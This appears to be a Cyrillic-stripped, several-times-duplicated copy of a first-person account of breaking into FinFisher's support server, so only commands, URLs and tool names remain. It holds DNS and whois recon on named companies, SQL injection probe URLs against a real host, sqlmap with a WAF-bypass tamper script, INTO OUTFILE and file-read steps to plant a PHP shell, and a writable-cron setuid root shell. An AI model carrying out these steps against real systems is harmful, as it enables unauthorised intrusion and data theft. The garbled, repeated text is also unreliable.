https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
